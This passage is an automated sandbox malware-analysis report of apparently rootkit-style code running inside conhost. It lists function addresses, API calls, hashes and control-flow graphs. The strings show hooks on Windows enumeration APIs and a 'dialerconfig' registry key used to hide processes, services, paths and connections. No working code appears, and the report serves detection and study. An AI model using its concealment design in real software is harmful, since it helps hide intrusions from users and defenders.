                                                                                                    execution_graph 13968 2505e591c28 13973 2505e591650 GetProcessHeap HeapAlloc 13968->13973 13970 2505e591c3e Sleep SleepEx 13971 2505e591c37 13970->13971 13971->13970 13972 2505e5915c0 StrCmpIW StrCmpW 13971->13972 13972->13971 14017 2505e591274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13973->14017 13975 2505e591678 14018 2505e591274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13975->14018 13977 2505e591689 14019 2505e591274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13977->14019 13979 2505e591692 14020 2505e591274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13979->14020 13981 2505e59169b 13982 2505e5916b6 RegOpenKeyExW 13981->13982 13983 2505e5916e8 RegOpenKeyExW 13982->13983 13984 2505e5918ce 13982->13984 13985 2505e591711 13983->13985 13986 2505e591727 RegOpenKeyExW 13983->13986 13984->13971 14021 2505e5912c8 RegQueryInfoKeyW 13985->14021 13988 2505e59174b 13986->13988 13989 2505e591762 RegOpenKeyExW 13986->13989 14031 2505e59104c RegQueryInfoKeyW 13988->14031 13991 2505e59179d RegOpenKeyExW 13989->13991 13992 2505e591786 13989->13992 13996 2505e5917d8 RegOpenKeyExW 13991->13996 13997 2505e5917c1 13991->13997 13995 2505e5912c8 16 API calls 13992->13995 13998 2505e591793 RegCloseKey 13995->13998 14000 2505e5917fc 13996->14000 14001 2505e591813 RegOpenKeyExW 13996->14001 13999 2505e5912c8 16 API calls 13997->13999 13998->13991 14002 2505e5917ce RegCloseKey 13999->14002 14003 2505e5912c8 16 API calls 14000->14003 14004 2505e59184e RegOpenKeyExW 14001->14004 14005 2505e591837 14001->14005 14002->13996 14009 2505e591809 RegCloseKey 14003->14009 14007 2505e591889 RegOpenKeyExW 14004->14007 14008 2505e591872 14004->14008 14006 2505e59104c 6 API calls 14005->14006 14010 2505e591844 RegCloseKey 14006->14010 14012 2505e5918ad 14007->14012 14013 2505e5918c4 RegCloseKey 14007->14013 14011 2505e59104c 6 API calls 14008->14011 14009->14001 14010->14004 14014 2505e59187f RegCloseKey 14011->14014 14015 2505e59104c 6 API calls 14012->14015 14013->13984 14014->14007 14016 2505e5918ba RegCloseKey 14015->14016 14016->14013 14017->13975 14018->13977 14019->13979 14020->13981 14022 2505e591499 RegCloseKey 14021->14022 14023 2505e591334 GetProcessHeap HeapAlloc 14021->14023 14022->13986 14024 2505e59135d RegEnumValueW 14023->14024 14025 2505e591485 GetProcessHeap HeapFree 14023->14025 14027 2505e5913af 14024->14027 14025->14022 14027->14024 14027->14025 14028 2505e5913dd GetProcessHeap HeapAlloc 14027->14028 14029 2505e59142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14027->14029 14030 2505e591413 GetProcessHeap HeapFree 14027->14030 14037 2505e591554 14027->14037 14028->14027 14029->14027 14030->14029 14032 2505e5910b9 14031->14032 14033 2505e5911b5 RegCloseKey 14031->14033 14032->14033 14034 2505e5910c7 RegEnumValueW 14032->14034 14035 2505e591149 GetProcessHeap HeapAlloc 14032->14035 14036 2505e59117f GetProcessHeap HeapFree 14032->14036 14033->13989 14034->14032 14035->14032 14036->14032 14038 2505e59156e 14037->14038 14041 2505e5915a4 14037->14041 14039 2505e59158d StrCmpW 14038->14039 14040 2505e591585 StrCmpIW 14038->14040 14038->14041 14039->14038 14040->14038 14041->14027 14042 2505e562908 14044 2505e562936 14042->14044 14043 2505e562a2b LoadLibraryA 14043->14044 14044->14043 14045 2505e562aa7 14044->14045

                                                                                                    Executed Functions

                                                                                                    Function 000002505E593458 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1683269324-0
                                                                                                    • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction ID: e23723634f239079efe5ef482868ad70eb78eaabc87ebcabcae97c3002fbcd4f
                                                                                                    • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction Fuzzy Hash: 68118B30610E01D2F7219721ADDE7D92290BB44B47FC501B49BCAC5196FF38C488CE18
                                                                                                    Function 000002505E591C28 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 000002505E591650: GetProcessHeap.KERNEL32 ref: 000002505E59165B
                                                                                                      • Part of subcall function 000002505E591650: HeapAlloc.KERNEL32 ref: 000002505E59166A
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5916DA
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591707
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591721
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591741
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E59175C
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E59177C
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591797
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5917B7
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5917D2
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5917F2
                                                                                                    • Sleep.KERNEL32 ref: 000002505E591C43
                                                                                                    • SleepEx.KERNELBASE ref: 000002505E591C49
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E59180D
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E59182D
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591848
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E591868
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E591883
                                                                                                      • Part of subcall function 000002505E591650: RegOpenKeyExW.ADVAPI32 ref: 000002505E5918A3
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5918BE
                                                                                                      • Part of subcall function 000002505E591650: RegCloseKey.ADVAPI32 ref: 000002505E5918C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1534210851-0
                                                                                                    • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction ID: f1320772364239a434be47288a97cf92ae0eee32445d144f9747ad0b12113194
                                                                                                    • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction Fuzzy Hash: 0031A725201F21D1FA54AB36DFD939A13A4BB44BC2F8650A19EC9C7697FF34C850CA98
                                                                                                    Function 000002505E562908 Relevance: 1.7, APIs: 1, Instructions: 186libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction ID: e652ce79e243bc08c4e1e017510b3e890d96c0b0de5381955907360cf7cd1011
                                                                                                    • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction Fuzzy Hash: 0E614336701A5183EFA8CF15DCC876DB395FB04B95FC49121DA9907795EB38E892CB08

                                                                                                    Non-executed Functions

                                                                                                    Function 000002505E592CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 203 2505e592cdc-2505e592d55 call 2505e5aecc0 206 2505e592d5b-2505e592d61 203->206 207 2505e593090-2505e5930b3 203->207 206->207 208 2505e592d67-2505e592d6a 206->208 208->207 209 2505e592d70-2505e592d73 208->209 209->207 210 2505e592d79-2505e592d89 GetModuleHandleA 209->210 211 2505e592d8b-2505e592d9b call 2505e5a3090 210->211 212 2505e592d9d 210->212 213 2505e592da0-2505e592dbe 211->213 212->213 213->207 217 2505e592dc4-2505e592de3 StrCmpNIW 213->217 217->207 218 2505e592de9-2505e592ded 217->218 218->207 219 2505e592df3-2505e592dfd 218->219 219->207 220 2505e592e03-2505e592e0a 219->220 220->207 221 2505e592e10-2505e592e23 220->221 222 2505e592e33 221->222 223 2505e592e25-2505e592e31 221->223 224 2505e592e36-2505e592e3a 222->224 223->224 225 2505e592e4a 224->225 226 2505e592e3c-2505e592e48 224->226 227 2505e592e4d-2505e592e57 225->227 226->227 228 2505e592f4d-2505e592f51 227->228 229 2505e592e5d-2505e592e60 227->229 230 2505e593082-2505e59308a 228->230 231 2505e592f57-2505e592f5a 228->231 232 2505e592e72-2505e592e7c 229->232 233 2505e592e62-2505e592e6f call 2505e591a14 229->233 230->207 230->221 237 2505e592f6b-2505e592f75 231->237 238 2505e592f5c-2505e592f68 call 2505e591a14 231->238 235 2505e592e7e-2505e592e8b 232->235 236 2505e592eb0-2505e592eba 232->236 233->232 235->236 240 2505e592e8d-2505e592e9a 235->240 241 2505e592eea-2505e592eed 236->241 242 2505e592ebc-2505e592ec9 236->242 244 2505e592fa5-2505e592fa8 237->244 245 2505e592f77-2505e592f84 237->245 238->237 249 2505e592e9d-2505e592ea3 240->249 251 2505e592efb-2505e592f08 lstrlenW 241->251 252 2505e592eef-2505e592ef9 call 2505e591d28 241->252 242->241 250 2505e592ecb-2505e592ed8 242->250 247 2505e592faa-2505e592fb3 call 2505e591d28 244->247 248 2505e592fb5-2505e592fc2 lstrlenW 244->248 245->244 246 2505e592f86-2505e592f93 245->246 254 2505e592f96-2505e592f9c 246->254 247->248 264 2505e592ffa-2505e593005 247->264 260 2505e592fe5-2505e592fef call 2505e593930 248->260 261 2505e592fc4-2505e592fce 248->261 258 2505e592ea9-2505e592eae 249->258 259 2505e592f43-2505e592f48 249->259 262 2505e592edb-2505e592ee1 250->262 255 2505e592f2b-2505e592f3d call 2505e593930 251->255 256 2505e592f0a-2505e592f14 251->256 252->251 252->259 254->264 265 2505e592f9e-2505e592fa3 254->265 255->259 269 2505e592ff2-2505e592ff4 255->269 256->255 266 2505e592f16-2505e592f29 call 2505e591554 256->266 258->236 258->249 259->269 260->269 261->260 270 2505e592fd0-2505e592fe3 call 2505e591554 261->270 262->259 271 2505e592ee3-2505e592ee8 262->271 274 2505e59307c-2505e593080 264->274 275 2505e593007-2505e59300b 264->275 265->244 265->254 266->255 266->259 269->230 269->264 270->260 270->264 271->241 271->262 274->230 280 2505e59300d-2505e593011 275->280 281 2505e593013-2505e59302d call 2505e5986a0 275->281 280->281 284 2505e593030-2505e593033 280->284 281->284 287 2505e593035-2505e593053 call 2505e5986a0 284->287 288 2505e593056-2505e593059 284->288 287->288 288->274 290 2505e59305b-2505e593079 call 2505e5986a0 288->290 290->274
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                    • API String ID: 2119608203-3850299575
                                                                                                    • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction ID: 5e0709815862efe802ed7359c45e75eeb4cdf8ea8e86c4e55cc9c47c24919687
                                                                                                    • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction Fuzzy Hash: EBB1B026210E50C1EB648F25DDC87E963A4F744B86FD460A6EE8993796FF35CD80CB44
                                                                                                    Function 000002505E597E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction ID: c23d714b202c221fde1521f3e350eca2c0467bcd1810bf85d4bc7971334757a2
                                                                                                    • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction Fuzzy Hash: 76313C72204F8485EB608F60ECC43DD7361F784749F84456ADB8D87A99EF38C548CB18
                                                                                                    Function 000002505E59B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction ID: 9354a2845cc7714b2a9ee4e1c570088617990842ec264ae1819e189ccdbe8e18
                                                                                                    • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction Fuzzy Hash: DA313E32214F8086EB608F25ECC43DE73A5F789799F900266EA9D47B55EF38C545CB04
                                                                                                    Function 000002505E59FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 1443284424-0
                                                                                                    • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction ID: 636c1e3b06029df0088c86e0660af75f9ed8612f54661368389bcf71a4af3630
                                                                                                    • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction Fuzzy Hash: E3E1E372714A809AE700CF64DCC83DD7BB1F34578AF944666EF8A57B99EA34C416CB04
                                                                                                    Function 000002505E591650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                    • API String ID: 106492572-2879589442
                                                                                                    • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction ID: 3139cf8046bb514e4688623e57be07620b99a5020dd30aeb56695fd9a58f31cf
                                                                                                    • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction Fuzzy Hash: CA710A26710F51C6EB109F66ECC879D27A4F785B8EF8112A1DA8D87A69FF38C445CB04
                                                                                                    Function 000002505E5912C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                    • String ID: d
                                                                                                    • API String ID: 2005889112-2564639436
                                                                                                    • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction ID: e844e875d29133f9c86232fa7698c22099c62d17490d6f35accde34e686044f2
                                                                                                    • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction Fuzzy Hash: 72514872214F54D2EB14CB62EDC839EB7A1F788B86F858264DB8947B14EF38C456CB04
                                                                                                    Function 000002505E591EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                    • API String ID: 4175298099-1975688563
                                                                                                    • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction ID: 3c1babcf03876547483fef2bf1b765349b20cac9363862c95e3f210a446c0181
                                                                                                    • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction Fuzzy Hash: F931E568601D4AE0FA04EF64FCE97D82325B744347FC466B3D68942163BE38829DCB9C
                                                                                                    Function 000002505E5923F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2171963597-1373409510
                                                                                                    • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction ID: 7ef3f1b231ac4ff2d91a1f13292fcef93ae9c85732082524e076d11961578214
                                                                                                    • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction Fuzzy Hash: D9210E35614A4082E7108B25FDC835E67A0F789BAAF904365DB9942EA9EF3CC149CF04
                                                                                                    Function 000002505E59104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                    • String ID: d
                                                                                                    • API String ID: 3743429067-2564639436
                                                                                                    • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction ID: 3e23dcc5ee773e3cae08eb5d892718dbf01268825bcdb9572bcbd32f75e6c53d
                                                                                                    • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction Fuzzy Hash: 44418033214B90D7E7608F51E98839EB7A1F388B89F408225DBC947B58EF38C564CB04
                                                                                                    Function 000002505E5669F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 318 2505e5669f0-2505e5669f6 319 2505e566a31-2505e566a3b 318->319 320 2505e5669f8-2505e5669fb 318->320 321 2505e566b58-2505e566b6d 319->321 322 2505e566a25-2505e566a64 call 2505e5670a0 320->322 323 2505e5669fd-2505e566a00 320->323 327 2505e566b6f 321->327 328 2505e566b7c-2505e566b96 call 2505e566f34 321->328 341 2505e566b32 322->341 342 2505e566a6a-2505e566a7f call 2505e566f34 322->342 325 2505e566a02-2505e566a05 323->325 326 2505e566a18 __scrt_dllmain_crt_thread_attach 323->326 332 2505e566a07-2505e566a10 325->332 333 2505e566a11-2505e566a16 call 2505e566fe4 325->333 330 2505e566a1d-2505e566a24 326->330 334 2505e566b71-2505e566b7b 327->334 339 2505e566bcf-2505e566c00 call 2505e567270 328->339 340 2505e566b98-2505e566bcd call 2505e56705c call 2505e566efc call 2505e5673f8 call 2505e567210 call 2505e567234 call 2505e56708c 328->340 333->330 350 2505e566c02-2505e566c08 339->350 351 2505e566c11-2505e566c17 339->351 340->334 345 2505e566b34-2505e566b49 341->345 353 2505e566a85-2505e566a96 call 2505e566fa4 342->353 354 2505e566b4a-2505e566b57 call 2505e567270 342->354 350->351 355 2505e566c0a-2505e566c0c 350->355 356 2505e566c5e-2505e566c74 call 2505e562858 351->356 357 2505e566c19-2505e566c23 351->357 371 2505e566ae7-2505e566af1 call 2505e567210 353->371 372 2505e566a98-2505e566abc call 2505e5673bc call 2505e566eec call 2505e566f18 call 2505e5690dc 353->372 354->321 361 2505e566cff-2505e566d0c 355->361 374 2505e566c76-2505e566c78 356->374 375 2505e566cac-2505e566cae 356->375 362 2505e566c25-2505e566c2d 357->362 363 2505e566c2f-2505e566c3d call 2505e572758 357->363 368 2505e566c43-2505e566c58 call 2505e5669f0 362->368 363->368 385 2505e566cf5-2505e566cfd 363->385 368->356 368->385 371->341 394 2505e566af3-2505e566aff call 2505e567260 371->394 372->371 421 2505e566abe-2505e566ac5 __scrt_dllmain_after_initialize_c 372->421 374->375 382 2505e566c7a-2505e566c9c call 2505e562858 call 2505e566b58 374->382 383 2505e566cb5-2505e566cca call 2505e5669f0 375->383 384 2505e566cb0-2505e566cb3 375->384 382->375 415 2505e566c9e-2505e566ca6 call 2505e572758 382->415 383->385 403 2505e566ccc-2505e566cd6 383->403 384->383 384->385 385->361 405 2505e566b25-2505e566b30 394->405 406 2505e566b01-2505e566b0b call 2505e567178 394->406 409 2505e566ce1-2505e566cf1 call 2505e572758 403->409 410 2505e566cd8-2505e566cdf 403->410 405->345 406->405 420 2505e566b0d-2505e566b1b 406->420 409->385 410->385 415->375 420->405 421->371 422 2505e566ac7-2505e566ae4 call 2505e569078 421->422 422->371
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 0f1fb978be7e679422a702753c49b8a575c286eaa1f4356e3236a4e573dc26b9
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: 8F81E271710E4186FB60AB269CCD39963D0FB857C2FC480A5AEC543796FBB9C8598F08
                                                                                                    Function 000002505E5975F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 425 2505e5975f0-2505e5975f6 426 2505e5975f8-2505e5975fb 425->426 427 2505e597631-2505e59763b 425->427 429 2505e5975fd-2505e597600 426->429 430 2505e597625-2505e597664 call 2505e597ca0 426->430 428 2505e597758-2505e59776d 427->428 434 2505e59777c-2505e597796 call 2505e597b34 428->434 435 2505e59776f 428->435 432 2505e597618 __scrt_dllmain_crt_thread_attach 429->432 433 2505e597602-2505e597605 429->433 445 2505e59766a-2505e59767f call 2505e597b34 430->445 446 2505e597732 430->446 441 2505e59761d-2505e597624 432->441 437 2505e597611-2505e597616 call 2505e597be4 433->437 438 2505e597607-2505e597610 433->438 448 2505e597798-2505e5977cd call 2505e597c5c call 2505e597afc call 2505e597ff8 call 2505e597e10 call 2505e597e34 call 2505e597c8c 434->448 449 2505e5977cf-2505e597800 call 2505e597e70 434->449 439 2505e597771-2505e59777b 435->439 437->441 458 2505e59774a-2505e597757 call 2505e597e70 445->458 459 2505e597685-2505e597696 call 2505e597ba4 445->459 451 2505e597734-2505e597749 446->451 448->439 460 2505e597811-2505e597817 449->460 461 2505e597802-2505e597808 449->461 458->428 478 2505e597698-2505e5976bc call 2505e597fbc call 2505e597aec call 2505e597b18 call 2505e599cdc 459->478 479 2505e5976e7-2505e5976f1 call 2505e597e10 459->479 463 2505e597819-2505e597823 460->463 464 2505e59785e-2505e597874 call 2505e593458 460->464 461->460 462 2505e59780a-2505e59780c 461->462 468 2505e5978ff-2505e59790c 462->468 469 2505e59782f-2505e59783d call 2505e5a3358 463->469 470 2505e597825-2505e59782d 463->470 486 2505e5978ac-2505e5978ae 464->486 487 2505e597876-2505e597878 464->487 475 2505e597843-2505e597858 call 2505e5975f0 469->475 490 2505e5978f5-2505e5978fd 469->490 470->475 475->464 475->490 478->479 528 2505e5976be-2505e5976c5 __scrt_dllmain_after_initialize_c 478->528 479->446 499 2505e5976f3-2505e5976ff call 2505e597e60 479->499 488 2505e5978b0-2505e5978b3 486->488 489 